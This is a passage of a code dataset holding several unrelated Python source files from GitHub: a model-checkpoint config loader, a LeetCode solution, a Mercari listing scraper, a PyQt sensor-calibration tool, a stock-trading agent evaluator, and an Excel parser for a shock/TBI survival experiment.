\"final_activation\": None,\n }\n\n elif checkpoint.name == \"v1_checkpoint_SmoothL1Loss=-0.00016112386947497725.pth\": # beads f4\n model_config = {\n \"nnum\": 19,\n \"z_out\": 51,\n \"kernel2d\": 3,\n \"c00_2d\": 488,\n \"c01_2d\": 488,\n \"c02_2d\": None,\n \"c03_2d\": None,\n \"c04_2d\": None,\n \"up0_2d\": 244,\n \"c10_2d\": 244,\n \"c11_2d\": None,\n \"c12_2d\": None,\n \"c13_2d\": None,\n \"c14_2d\": None,\n \"up1_2d\": None,\n \"c20_2d\": None,\n \"c21_2d\": None,\n \"c22_2d\": None,\n \"c23_2d\": None,\n \"c24_2d\": None,\n \"up2_2d\": None,\n \"c30_2d\": None,\n \"c31_2d\": None,\n \"c32_2d\": None,\n \"c33_2d\": None,\n \"c34_2d\": None,\n \"last_kernel2d\": 1,\n \"cin_3d\": 7,\n \"kernel3d\": 3,\n \"c00_3d\": 7,\n \"c01_3d\": None,\n \"c02_3d\": None,\n \"c03_3d\": None,\n \"c04_3d\": None,\n \"up0_3d\": 7,\n \"c10_3d\": 7,\n \"c11_3d\": 7,\n \"c12_3d\": None,\n \"c13_3d\": None,\n \"c14_3d\": None,\n \"up1_3d\": None,\n \"c20_3d\": None,\n \"c21_3d\": None,\n \"c22_3d\": None,\n \"c23_3d\": None,\n \"c24_3d\": None,\n \"up2_3d\": None,\n \"c30_3d\": None,\n \"c31_3d\": None,\n \"c32_3d\": None,\n \"c33_3d\": None,\n \"c34_3d\": None,\n \"init_fn\": \"xavier_uniform\",\n \"final_activation\": None,\n }\n else:\n raise NotImplementedError(checkpoint)\n\n return TrainRunConfig(\n batch_multiplier=1,\n batch_size=1,\n crit_apply_weight_above_threshold=None,\n crit_beta=None,\n crit_decay_weight_by=None,\n crit_decay_weight_every_unit=None,\n crit_decay_weight_every_value=None,\n crit_decay_weight_limit=None,\n crit_ms_ssim_weight=None,\n crit_threshold=None,\n crit_weight=None,\n criterion=None,\n data_range=1.0,\n dataset=dataset,\n eval_batch_size=1,\n interpolation_order=2,\n lr_sched_factor=None,\n lr_sched_patience=None,\n lr_sched_thres=None,\n lr_sched_thres_mode=None,\n lr_scheduler=None,\n max_epochs=None,\n model=model_config,\n model_weights=checkpoint,\n opt_lr=None,\n opt_momentum=None,\n opt_weight_decay=None,\n optimizer=None,\n patience=None,\n save_output_to_disk=None,\n score_metric=None,\n seed=None,\n validate_every_unit=None,\n validate_every_value=None,\n win_sigma=1.5,\n win_size=11,\n hylfm_version=\"0.0.0\",\n point_cloud_threshold=1.0,\n )\n","repo_name":"kreshuklab/hylfm-net","sub_path":"hylfm/load_old_checkpoint.py","file_name":"load_old_checkpoint.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"82"} +{"seq_id":"4762574646","text":"class Solution:\n def divisorGame(self, N: int) -> bool:\n @lru_cache(None)\n def dfs(n):\n if n == 1:\n return False\n res = False\n for i in range(1, n):\n if n % i == 0:\n res |= not dfs(n - i)\n return res\n \n return dfs(N)\n\n'''\nhttps://leetcode.com/problems/divisor-game/discuss/274566/just-return-N-2-0-(proof)\n\nprove it by two steps:\n\nif Alice will lose for N, then Alice will must win for N+1, since Alice can first just make N decrease 1.\nfor any odd number N, it only has odd factor, so after the first move, it will be an even number\nlet's check the inference\nfisrt N = 1, Alice lose. 
then Alice must win for 2.\nif N = 3: every even number (2) smaller than 3 lets Alice win, so Alice loses for 3\n3 lose -> 4 win\nevery even number (2, 4) smaller than 5 lets Alice win, so Alice loses for 5\n...\n\nTherefore, Alice always wins for even numbers and loses for odd numbers.\n\n'''\nclass Solution2:\n    def divisorGame(self, N: int) -> bool:\n        return N % 2 == 0
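\n\n# Sanity-check sketch (illustrative; Solution assumes lru_cache is in scope,\n# e.g. via \"from functools import lru_cache\"):\n# assert all(Solution().divisorGame(n) == Solution2().divisorGame(n)\n#            for n in range(1, 30))","repo_name":"KOPFYF/LCEveryday","sub_path":"Dynamic Programming/minimax/divisorGame1025.py","file_name":"divisorGame1025.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}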
+{"seq_id":"28810733396","text":"import csv\nfrom .notification import notify\nfrom .mercari_driver import MercariDriver, get_scrapper_driver\nfrom .input import Input\n\n\n\ndef main():\n    \n    \n    # create an input (1 or 2) to select if the program needs manual input or text file input\n\n    while True:\n        try:\n            input_type = int(\n                input(\"[1]: Enter data manually \\n[2]: Read input from input.csv:\\n\"))\n            if input_type == 1:\n                input_class = Input()\n                input_class.set_MERCARI_URL()\n                input_class.set_QUANTITY()\n                input_class.set_PRODUCT_CATEGORY()\n                input_class.set_INTEREST_RATE()\n                input_class.set_TRANS_LANG()\n                \n                MERCARI_URL = input_class.get_MERCARI_URL()\n                QUANTITY = input_class.get_QUANTITY()\n                PRODUCT_CATEGORY = input_class.get_PRODUCT_CATEGORY()\n                INTEREST_RATE = input_class.get_INTEREST_RATE()\n                TRANS_LANG = input_class.get_TRANS_LANG()\n                \n                driver = get_scrapper_driver()\n                m_scrapper = MercariDriver(driver)\n                m_scrapper.move_page(MERCARI_URL)\n\n\n                latest_item_url_list = m_scrapper.get_items_url(quantity=QUANTITY)\n\n                for item_url in latest_item_url_list:\n\n                    m_scrapper.move_page(item_url)\n                    item_name, item_price, item_description = m_scrapper.get_name_and_price()\n                    if item_name is None or item_price is None or item_description is None:\n                        continue\n                    \n                    notify(item_url, item_name, item_price, item_description, TRANS_LANG, INTEREST_RATE, PRODUCT_CATEGORY)\n\n                driver.close()\n                driver.quit()\n\n                break\n            elif input_type == 2:\n                \n                #read input.csv file, ignore first line.\n                #enumerate the lines and assign the values to the variables\n                driver = get_scrapper_driver()\n\n                with open('input.csv') as csv_file:\n                    csv_reader = csv.reader(csv_file, delimiter=',')\n                    line_count = 0\n                    #create a for loop for row in csv_reader\n                    \n                    \n                    for row in csv_reader:\n                        \n                        \n                        if line_count == 0:\n                            #print(f'Column names are {\", \".join(row)}')\n                            line_count += 1\n                        else:\n                            print(f'\\tKeyword: {row[0]} Product count: {row[1]} Category: {row[2]} Interest rate: {row[3]} Language: {row[4]}.')\n                            \n\n                            \n                            MERCARI_URL = \"https://jp.mercari.com/search?keyword=\" + row[0]\n                            QUANTITY = int(row[1])\n                            PRODUCT_CATEGORY = row[2]\n                            INTEREST_RATE = float(row[3])\n                            TRANS_LANG = row[4]\n                            \n                            m_scrapper = MercariDriver(driver)\n\n                            m_scrapper.move_page(MERCARI_URL)\n\n\n                            latest_item_url_list = m_scrapper.get_items_url(quantity=QUANTITY)\n\n                            for item_url in latest_item_url_list:\n                                \n                                m_scrapper.move_page(item_url)\n                                item_name, item_price, item_description = m_scrapper.get_name_and_price()\n\n                                if item_name is None or item_price is None or item_description is None:\n                                    print(\"Could not get the product name, price or description\")\n                                    continue\n                                \n                                notify(item_url, item_name, item_price, item_description, TRANS_LANG, INTEREST_RATE, PRODUCT_CATEGORY)\n\n                            \n                            line_count += 1\n                    \n                    \n                    print(f'Processed {line_count-1} entries.')\n                    driver.close()\n                    driver.quit()\n\n                    break\n                \n                \n            else:\n                print(\"Please enter 1 or 2!!!\")\n                continue\n        except ValueError:\n            print(\"Please enter a number, not a letter!!!\")\n            continue\n\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"alexanderbkl/mercari_crawler","sub_path":"scrapper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"3591606711","text":"# -*- coding: utf-8 -*-\n# author: Joy Wang\n#\n# update time : 03/16/2017\n#\n# this module initializes the cal_window\n\nimport os\nimport sys\nfrom PyQt4.Qt import *\nfrom qgis.gui import *\nfrom PyQt4 import QtGui\nimport xlrd\nimport xlwt\nimport numpy as np\nimport cal_window\nimport selectSheet\n\ntry:\n    _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n    def _fromUtf8(s):\n        return s\n\nguiPath = os.getcwd()\nsys.path.append(guiPath)\n\n\nclass CalWindow(QDialog, cal_window.Ui_Dialog):\n    def __init__(self):\n        super(CalWindow,self).__init__()\n        self.setupUi(self)\n        self._select_sheets = []\n        self.column_1s = None\n        self.column_2s_1 = None\n        self.column_2s_2 = None\n        self.element = self._readConfig()\n\n    def openPara(self):\n        u'''\n        Open the parameter workbook and put its path into the line edit\n        :return:\n        '''\n        para_path = QFileDialog.getOpenFileName(self, u\"Open parameter workbook\", guiPath, \"table(*.xls)\")\n        self.lineEdit.setText(para_path)\n\n    def openData(self):\n        u'''\n        Open the workbook with the data to be calibrated\n        :return:\n        '''\n        data_path = QFileDialog.getOpenFileName(self, u\"Open data workbook to calibrate\", guiPath, \"table(*.xls)\")\n        self.lineEdit_2.setText(data_path)\n\n    def openparafile(self):\n        u'''\n        Read the parameter file and set the enabled state of the output buttons below\n        :return:\n        '''\n        para_path = self.lineEdit.text()\n        if os.path.isfile(para_path):\n            self._para_data = xlrd.open_workbook(para_path)\n            element_para = self._para_data.sheet_names()\n            for i in self.element:\n                if not i in element_para:\n                    QMessageBox.critical(self,u'error',u'Sheet names in the parameter file do not match')\n                    return 0\n            self.node_split()\n            self._check_enable()\n\n    def opendatafile(self):\n        u'''\n        Read the data file and, together with the parameter file, set the enabled state of the outputs\n        :return:\n        '''\n        data_path = self.lineEdit_2.text()\n        self._check_enable()\n\n    def _check_enable(self):\n        u'''\n        Check that the files in the input boxes exist; if so, enable the output-file options\n        :return:\n        '''\n        data_path = self.lineEdit_2.text()\n        if os.path.isfile(data_path):\n            self._data_data = xlrd.open_workbook(data_path)\n            if os.path.isfile(self.lineEdit.text()):\n                self.pushButton_4.setEnabled(True)\n            else:\n                self.pushButton_4.setEnabled(False)\n\n    def openSelect(self):\n        u'''\n        Open the selectSheet window (like the one in the UI) and pass it the parameters.\n        :return:\n        '''\n        self.k_sheet = self._para_data.sheet_by_index(0)\n        self.b_sheet = self._para_data.sheet_by_index(1)\n        self.data_node_list = self._data_data.sheet_names()\n        para_node_list_temp = self.k_sheet.col_values(0)\n        para_node_list_temp2 = map(int,para_node_list_temp)\n        self.para_node_list = map(str,para_node_list_temp2)\n        node_list = [val for val in self.data_node_list if val in self.para_node_list]\n        self.select = selectSheet.SelectWindow()\n        self.select._get_namelist(node_list)\n        self.select.enable_sheet(self._select_sheets)\n        self.select.show()\n        QtCore.QObject.connect(self.select.confirm, QtCore.SIGNAL(_fromUtf8(\"clicked()\")), self.name_list)\n\n    def name_list(self):\n        u'''\n        Get the user's selection from the select page\n        :return:\n        '''\n        self._select_sheets = self.select.confirm_selection()\n        if self._select_sheets != []:\n            self._get_range()\n            self.pushButton_2.setEnabled(True)\n\n    def enableButton(self):\n        u'''\n        Check whether the output options are fully selected; if so, enable the calibrate button at the bottom\n        :return:\n        '''\n        if self._select_sheets != []:\n            self._get_range()\n            self.pushButton_2.setEnabled(True)
\n\n    def _get_range(self):\n        u'''\n        Get the output channels chosen by the user\n        :return:\n        '''\n        self.export_range = range(self.data_start, self.data_end + 1)\n\n    def cal(self):\n        u'''\n        Calibrate every column and store it in a new file (columns keep their\n        relative positions, with the first column at the very start)\n        :return:\n        '''\n        file_path = QFileDialog.getSaveFileName(self, 'save file', \"saveFile\", \"excel files(*.xls)\")\n        if file_path is u'':\n            return 0\n        channel_list = self.export_range\n\n        prog_max = len(self._select_sheets) * len(channel_list) * self._data_data.sheet_by_name(u\"%s\"%self._select_sheets[0]).nrows + 10\n        progdialog = QtGui.QProgressDialog(u\"Calculating...\",u\"Cancel\",0,prog_max,self)\n        progdialog.setWindowTitle(u\"Calculation progress\")\n        progdialog.setWindowModality(QtCore.Qt.WindowModal)\n        progdialog.show()\n        prog_id = 0\n\n        file = xlwt.Workbook()\n        for i in range(len(self._select_sheets)):\n            table = file.add_sheet(\"%s\"%self._select_sheets[i],cell_overwrite_ok=True)\n            for j in channel_list:\n                k,b = self.getPara(self._select_sheets[i],j)\n                if k == u\"None\":\n                    continue\n                if k == u'':\n                    continue\n                ori_array = self.get_oriarray(self._select_sheets[i], j)\n                try:\n                    cal_array = k * ori_array + b\n                except:\n                    cal_array = np.array([])\n                cal_list = cal_array.tolist()\n                for k in range(len(cal_list)):\n                    table.write(k,j-self.data_start,cal_list[k])\n                progdialog.setValue(prog_id)\n                prog_id = prog_id + 1\n\n        file.save(file_path)\n        prog_id = prog_id + 10\n        progdialog.setRange(0,prog_id)\n        progdialog.setValue(prog_id)\n        progdialog.accept()\n        QMessageBox.information(self, u\"Info\", u\"Operation succeeded!\")
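\n\n    # The calibration above is just an affine map applied per column; a minimal\n    # stand-alone sketch with hypothetical k, b and readings:\n    #   import numpy as np\n    #   k, b = 2.5, -0.1\n    #   readings = np.array([1.0, 2.0, 3.0])\n    #   calibrated = k * readings + b  # -> [2.4, 4.9, 7.4]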
\n\n    def getPara(self,node_name,range_j):\n        u'''\n        Read the calibration parameters k and b for the given node, channel and sensor\n        :param node_name:\n        :param range_j:\n        :return:\n        '''\n        table_k = self._para_data.sheet_by_index(0)\n        table_b = self._para_data.sheet_by_index(1)\n        index = self.para_node_list.index(node_name)\n        k = table_k.cell_value(index,range_j + 1 - self.data_start)\n        b = table_b.cell_value(index,range_j + 1 - self.data_start)\n        return k,b\n\n    def get_oriarray(self,node_name,range_j):\n        u'''\n        Get the raw (pre-calibration) column\n        :param node_name:\n        :param range_j:\n        :return:\n        '''\n        table = self._data_data.sheet_by_name(u\"%s\"%node_name)\n        ori_list = table.col_values(range_j)\n        '''\n        if int(node_name) in self.node_1 :\n            ori_list = table.col_values(range_j)\n        elif int(node_name) in self.node_2_2 or int(node_name) in map(int, self.node_2_1):\n            ori_1 = table.col_values(range_j)\n            if range_j - self.data_start > self.column_2s_2:\n                ori_2 = table.col_values(range_j - self.column_2s_1)\n            else:\n                ori_2 = table.col_values(range_j + self.column_2s_2)\n            ori_list = self.getmax(ori_1,ori_2)\n        '''\n        ori_array = np.array(ori_list)\n        return ori_array\n\n    def getmax(self,list1,list2):\n        u'''\n        Currently unused\n        :param list1:\n        :param list2:\n        :return:\n        '''\n        list = []\n        for i in range(len(list1)):\n            if list1[i] >= list2[i]:\n                list.append(list1[i])\n            else:\n                list.append(-30000)\n        return list\n\n    def get_parapath(self, para_path,data_path):\n        u'''\n        Run when this window is opened from the UI window, to pick up the file paths\n        the user already entered there\n        :param para_path:\n        :param data_path:\n        :return:\n        '''\n        if para_path is not u\"\":\n            self.lineEdit.setText(u\"%s\" % para_path)\n            self.openparafile()\n        self.lineEdit_2.setText(u\"%s\" % data_path)\n        self.opendatafile()\n\n    def _readConfig(self):\n        u'''\n        Read the config files that describe the layout of the data workbook\n        :return:\n        '''\n        file = open(\"config\\data_config.txt\", \"r\")\n        line = \"start reading\"\n        while (1):\n            if (line == \"\"):\n                break\n            line = file.readline()\n            split = line.strip().upper().split(\"=\")\n            if split[0].strip() == \"DATA_START\":\n                self.data_start = int(split[1].strip()) - 1\n            if split[0].strip() == \"DATA_END\":\n                self.data_end = int(split[1].strip()) - 1\n            if split[0].strip().upper() == \"COLUMN_1S_1\":\n                self.column_1s = int(split[1].strip())\n            if split[0].strip().upper() == \"COLUMN_2S_1\":\n                self.column_2s_1 = int(split[1].strip())\n            if split[0].strip().upper() == \"COLUMN_2S_2\":\n                self.column_2s_2 = int(split[1].strip())\n        file.close()\n\n        file = open(\"config\\\\2sides_config.txt\", \"r\")\n        line = \"start reading\"\n        while (1):\n            if (line == \"\"):\n                break\n            line = file.readline()\n            split = line.strip().upper().split(\"=\")\n            if split[0].strip() == \"NODE_2S_1\":\n                temp = split[1].strip().split(',')\n                self.node_2_1 = temp\n        file.close()\n\n        element = []\n        file = open(\"config\\export_config.txt\", \"r\")\n        line = \"start reading\"\n        while (1):\n            if (line == \"\"):\n                break\n            line = file.readline()\n            split = line.strip().split(\"=\")\n            if split[0].strip().upper() == \"K\":\n                element.append(split[1].strip())\n            if split[0].strip().upper() == \"B\":\n                element.append(split[1].strip())\n            if split[0].strip().upper() == 'MSE':\n                element.append(split[1].strip())\n            if split[0].strip().upper() == 'R2':\n                element.append(split[1].strip())\n        file.close()\n\n        if len(element) is not 0:\n            return element\n        else:\n            QMessageBox.critical(u'error', u'error in reading the config')\n\n    def node_split(self):\n        u'''\n        Get the node ids of each type\n        :return:\n        '''\n        k = self._para_data.sheet_by_name(self.element[1])\n        node_1s = []\n        node_2s_2 = []\n        r = k.nrows\n        for i in range(r):\n            nodename = k.cell_value(i,0)\n            row = k.row_values(i)\n            if row.count('') == self.column_1s - self.column_1s:\n                node_1s.append(nodename)\n            elif row.count('') == self.column_2s_2:\n                node_2s_2.append(nodename)\n\n        self.node_1 = node_1s\n        self.node_2_2 = node_2s_2\n\n\n","repo_name":"lyobo/Sensor-calibration","sub_path":"project/cal.py","file_name":"cal.py","file_ext":"py","file_size_in_byte":10969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"73675734347","text":"import os\nimport logging\nimport math\nimport numpy as np\n\nfrom utils import get_state\nfrom utils import format_1, format_2\n\n\ndef evaluate_model(agent, data, window_size, debug):\n    \"\"\"\n    Arguments:\n        agent: the agent.\n        data: the data used to evaluate the model.\n        window_size (int): the number of time units taken into account to do a prediction.\n        debug (bool): controls whether or not to debug.\n    Returns:\n        a tuple of length 2 consisting of total profit and trading history.\n        total profit is a float.\n        trading history is an array of price-action pairs.\n        an action is one of the strings \"BUY\", \"SELL\", or \"HOLD\".\n    \"\"\"\n\n    total_profit = 0\n\n    history = []\n    agent.inventory = []\n\n    state = get_state(data, 0, window_size + 1)\n    data_length = len(data) - 1\n\n    for t in range(data_length):\n        reward = 0\n        next_state = get_state(data, t + 1, window_size + 1)\n\n        action = agent.act(state, is_eval=True)\n\n        if action == 1:\n            agent.inventory.append(data[t])\n\n            history.append((data[t][0], \"BUY\"))\n            if debug:\n                logging.debug(\"Buy at: {}\".format(format_1(data[t][0])))\n\n        elif action == 2 and len(agent.inventory) > 0:\n            bought_price = agent.inventory.pop(0)\n            delta = data[t][0] - bought_price[0]\n            reward = 100*(delta/bought_price[0])  # reward is the percentage return on the position\n            total_profit += delta\n\n            history.append((data[t][0], \"SELL\"))\n            if debug:\n                logging.debug(\"Sell at: {} | Position: {}\".format(\n                    format_1(data[t][0]), format_2(data[t][0] - bought_price[0])))\n\n        else:\n            history.append((data[t][0], \"HOLD\"))\n            if debug:\n                
logging.debug(\"Hold at: {}\".format(format_1(data[t][0])))\n\n agent.memory.remember(state, action, reward,\n next_state, (t == data_length - 1))\n state = next_state\n\n return {\n 'total profit': total_profit,\n 'trading history': np.array(history),\n }\n","repo_name":"Kevinht2010/stock-trader","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"11602147035","text":"\"\"\"\"\nThis file loads the excel data from the survival HS/TBI experiment. It parses the Excel sheet into a dataframe and has\noutput functions, subselection functions and plotting functions that should be general enough to use conversationally.\nMatt Maggio\n4/12/19\n\nThis file has grown signficantly since I started it. It now houses a lot of functionality related to the SA-1 Experiments.\nNeed to possibly break this file out into a class calling the loader functions here.\n6/7/19\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xlsxwriter as xlwrite\nimport time, re, datetime, winsound\nimport lifelines, sys, pdb\nimport SA1DataManipulation\nimport pickle\nimport os\n\n\ndef Parse_excel(path=None, Experiment_lst = [\"2018124\"]):\n #There were many formating decisions made to make the sheet more human readable.\n #basically this function is gathering the data back into a machine readable form.\n #Output is going to be a dict for each experiment that has key value pairs and pd.series of data as outputs.\n #later I think I can pile all of this into a giant dataframe or I can have a subselection function to go through and pull the data I need using a loop.\n\n\n xls = pd.ExcelFile(path)\n df = pd.read_excel(xls, sheet_name=Experiment_lst, header= None)\n\n Output_lst = []\n\n #Iterate through all the sheets, get the sheet as a dataframe, reformating until it's sensible.\n for exp in Experiment_lst:\n print(\"Loading experiment {0}\".format(exp))\n t1 = time.time()\n df_exp = df[exp]\n #Get the Unique var names\n slice_lst = [slice(3,21), slice(23,30)]\n UVar = pd.concat([df_exp.iloc[slice_lst[0],1], df_exp.iloc[slice_lst[1],1]])\n UVar = Drop_units(UVar) # Shorten the names to take the units out.\n UVal = pd.concat([df_exp.iloc[slice_lst[0],4], df_exp.iloc[slice_lst[1],4]])\n Udict = dict(zip(UVar, UVal))\n\n\n\n # Time values are known a priori\n Time = np.concatenate([np.arange(0, 20, 5), np.arange(30, 240+15, 15), np.arange(8 * 60, (72+4) * 60, 4 * 60)])\n\n # Special one off to get the hespand delievered in a time resolved manner.\n HesDelivered = df_exp.iloc[19, slice(5, 6 + 35)]\n\n\n #Get the Repeditive var names and data. 
        # Special one-off to get the Hespan delivered in a time-resolved manner.\n        HesDelivered = df_exp.iloc[19, slice(5, 6 + 35)]\n\n\n        #Get the repetitive var names and data. Similar to above.\n        indexX = [slice(33,63), slice(64, 74), slice(86, 104), slice(105, 123), slice(128, 137), slice(138, 147), slice(158, 179), slice(180, 197) ]\n        indexY = slice(5, 41)\n\n        RVar = list()\n        RVal = list()\n        for i in range(0,len(indexX)): #Run a loop to make this less verbose\n            RVar.append(df_exp.iloc[indexX[i], 1])\n            RVal.append(df_exp.iloc[indexX[i], indexY])\n        RVar = pd.concat(RVar, axis=0)\n        RVar = Drop_units(RVar) # Shorten the names to take the units out.\n        RVal = pd.concat(RVal, axis=0)\n\n        RDict = dict()\n        #Loop through RVar, adding key and value pairs adding the series to the dict\n        for index, key in enumerate(RVar):\n            RDict[key] = RVal.iloc[index, :]\n\n        ExpDict = {**Udict, **RDict}\n        #Add a few more fields and then stack up into a list to complete the experiment loading\n        ExpDict[\"experimentNumber\"] = exp\n        ExpDict[\"Time\"] = Time\n        ExpDict['HESDelivered'] = HesDelivered\n        # print(\"Experiment {0} Loaded and Parsed taking {1}\".format(exp, time.time()-t1))\n        Output_lst.append(ExpDict)\n    print(\"done\")\n\n    return Output_lst\n\ndef Drop_units(series):\n    #Remove everything that is between (), remove all commas\n    #Learning regex. Be Gentle.\n    output = list()\n    for entry in series:\n        # Find text between () that matches either OPTI or AVOX, it appears that we are overwriting some fields.\n        TechniqueLst = ['(OPTI)', '(AVOX)', '(OPTI ELYTE)']\n        Technique = re.search( '\\\\(.*?\\\\)', entry) #A match object for the first match between the pattern and the entry.\n\n        entry = re.sub('\\\\(.*?\\\\)','', entry)#Remove all text between ()'s\n        entry = re.sub(r',',' ', entry) #Remove commas, replace with white space\n        entry = re.sub(r'\\\\s\\\\s+', ' ', entry) # Remove double white space\n        if not Technique is None:\n            if Technique.group(0) in TechniqueLst:\n                # print('adding in the tech ()' + Technique.group(0) )\n                output.append(entry.strip()+' '+ Technique.group(0) )\n            else:\n                output.append(entry.strip())\n        else:\n            output.append(entry.strip())\n        # print(entry)\n    return pd.Series(output)\n\ndef Randomize_groups(Dataset):\n    #This function should only be used to randomly assign groups to the data before the blind has been broken, and to test other code.\n    Group_original = [\"A\", \"B\", \"C\", \"D\"]\n    Group = Group_original.copy() #Draw each group with replacement\n    for exp in Dataset:\n        if exp[\"Intervention\"] == \"XXX\":\n            exp[\"Intervention\"] = np.random.choice(Group)\n            Group.remove(exp[\"Intervention\"])\n            if len(Group) == 0: #If we have drawn all 4 groups, replace for the next loop.\n                Group = Group_original.copy()\n    #return Dataset #Intentionally broken to prevent dumb mistakes.\n\n\ndef selectData(Dataset, Key = 'Ao systolic', KeyType = None, groupBy = 'Intervention', returnForm = 'array'):\n    #This function iterates through all the data in the list, subselects the key of interest and returns it, organized by group.\n    #If groupBy names a field (e.g. 'Block'), we group by the ordinal values of that field instead of by Intervention.\n    #Key is a single field name. TODO: eventually it would be SWEET to take Key as a list and call this function recursively!\n    #Clarifying the output: we return a dict of the form {group A: data A, group B: data B, ...} where each value is a np.array (a DataFrame seemed like a bad fit here).\n    #returnForm has four accepted values:\n    # 'means' gives just the per-time-point mean value,\n    # 'array' gives back a numpy array that the user can do w/e with,\n    # 'standardError' gives back the standard error of each time point within the dataset,\n    # 'N' gives back the number of non-NaN observations at each time point.\n
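    # Example usage (hypothetical field; the group keys depend on the workbook):\n    #   means = selectData(Dataset, Key='Ao mean', returnForm='means')   # {'NS': 1-D array of per-time-point means, ...}\n    #   counts = selectData(Dataset, Key='Ao mean', returnForm='N')      # per-time-point observation counts per group\n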
    groupNames = []\n    data = dict()\n\n    #If the user doesn't specify the type to expect the data in, we would have to inspect one of the experiments to find out (left as a stub below).\n    # if KeyType == None:\n    #     sample = Dataset[1][Key]\n    #     samplenotnana = np.invert(np.isnan(sample))\n    #     # KeyType = type(sample.iloc[sampleIdx[]])\n\n    for exp in Dataset:\n        if not exp[groupBy] in groupNames: # if our treatment group hasn't been seen yet, add it.\n            groupNames.append(exp[groupBy]) #Add the group name since we haven't seen it before; whatever type it is doesn't matter: y/n, int, categorical.\n            data[str((exp[groupBy]))] = [] # Create an empty list to placehold for the array.\n        # print(groupNames)\n        # print(str(exp['Intervention']) , ' ', str(exp[Key]) )\n        data[str((exp[groupBy]))].append(exp[Key]) #Add the data by appending it to the list that is the value of the dict.\n\n\n\n    try:\n        for group in data.keys():\n            #Let numpy cast the data into an array.\n            data[group] = np.array(data[group], dtype=np.float64) #Failure here means we shouldn't output anything. No number\n            if returnForm == 'means':\n                #return means across the experiments.\n                data[group] = np.nanmean(data[group], axis=0)\n            elif returnForm == 'N':\n                #return the counts of observations across the group.\n                data[group] = np.sum(np.invert(np.isnan(data[group])), axis=0)\n            elif returnForm == 'standardError':\n                #Return the standard error of the mean.
 (Sample std means ddof=1 for nanstd.)\n                data[group] = np.nanstd(data[group], axis=0,ddof=1) / np.sqrt(np.sum(np.invert(np.isnan(data[group])), axis=0))\n        return data #Send out the array if the user doesn't want other ways of display.\n    except (TypeError, ValueError):  # non-numeric fields end up here\n        print('Data could not be accessed correctly.')\n        return None\n\n\ndef BoxPlot(Data):\n    #Call with data preselected via selectData (a dict of per-group lists, i.e. the default returnForm='array' shape).\n    fig1, ax1 = plt.subplots()\n    boxes = []\n    for key in Data.keys(): #Add other types and sizes of data for sensible plotting.\n        if isinstance(Data[key][0], datetime.time):\n            box = []\n            for point in Data[key]:\n                box.append((point.hour*60) + point.minute)\n            boxes.append(box)\n    ax1.boxplot(boxes)\n    return (fig1, ax1) # This is a plotting function, so it returns the plot objects.\n\n\n\n\ndef LinearPlot(Data, xData, ylabel, averageGroups= False, Groups = None ):\n    # Groups = [\"A\"] #Test code, remove. If Groups is None, use all the keys in the dict as the groups.\n    color_lst = ['blue', 'purple', 'red', 'green', 'cyan']\n    fig, (ax, ax2) = plt.subplots(1, 2, sharey=True, facecolor='w')\n    plt.title(\"Group {0} vs Time\".format(str(Groups)))\n    if Groups is None:\n        Groups = Data.keys()\n    for index, group in enumerate(Groups):\n        for exp in Data[group]:\n            if not len(Groups) == 1: #If more than one group is plotted, keep colors the same per group.\n                ax.plot(xData, exp, color=color_lst[index])\n                ax2.plot(xData, exp, color=color_lst[index])\n            else:\n                ax.plot(xData,exp)\n                ax2.plot(xData,exp)\n    #This is just complex plotting code to make the x scaling work.\n    ax.set_xlim(0, 240)\n    ax2.set_xlim(240 + (3*60), 72*60)\n    ax.spines['right'].set_visible(False)\n    ax2.spines['left'].set_visible(False)\n    ax.yaxis.tick_left()\n    ax.tick_params(labelright='off')\n    ax2.yaxis.tick_right()\n    d = .015\n    #This stuff I don't understand. Some clever guy on stack overflow is getting credit for it. https://stackoverflow.com/questions/32185411/break-in-x-axis-of-matplotlib/32186074#32186074\n    #TODO Consider this package: https://github.com/bendichter/brokenaxes\n    kwargs = dict(transform=ax.transAxes, color='k', clip_on=False)\n    ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)\n    ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)\n    kwargs.update(transform=ax2.transAxes)  # switch to the bottom axes\n    ax2.plot((-d, +d), (1 - d, 1 + d), **kwargs)\n    ax2.plot((-d, +d), (-d, +d), **kwargs)\n    plt.xlabel(\"Time (min)\") #TODO Usually true;
 work on this later.\n    # ax.set_xticks(xData) #TODO Cut the distance between points in the survival phase so we get equal weights.\n    # ax.set_xticklabels(xData)\n    ax2.set_ylabel(ylabel)  # Axes objects have set_ylabel(); plain .ylabel() only exists on pyplot\n    return (fig, (ax, ax2)) # This is a plotting function, so it returns the plot objects.\n\ndef survivalPlot(Dataset=None): #TODO Implement.\n\n    from lifelines.datasets import load_waltons\n    from lifelines.statistics import logrank_test\n    import distutils.util\n    if Dataset is None: #Test data\n        df = load_waltons() # returns a Pandas DataFrame\n        groups = df['group']\n        Treatment = 'miR-137'\n        print(df.head())\n    else:\n        #Collect the survival data and groups in a manner similar to above\n        # Survival time\n        # Survival 240 minutes\n        # Survival 72 hours\n        Event = selectData(Dataset, Key='Survival 72 hours')\n        Event = {g: [distutils.util.strtobool(e) for e in v] for g, v in Event.items()} #FIX THIS -- the Y/N fields are strings, so the float cast inside selectData also needs attention\n        Time = selectData(Dataset, Key='Survival time')\n        Groups = Event.keys()\n        (Earray, Tarray, Garray) = (np.empty(0), np.empty(0), np.empty(0))\n        for group in Groups:\n            Earray = np.concatenate((Earray, Event[group]))  # np.concatenate takes a tuple of arrays\n            Tarray = np.concatenate((Tarray, Time[group]))\n            Garray = np.concatenate((Garray, np.array((((str(group)+' ')*len(Event[group])).split(' ')[:-1]))))\n        df = pd.DataFrame({'E':Earray, 'T':Tarray,'groups': Garray})\n        print(df)\n        \"\"\"\n           T  E    group\n        0  6  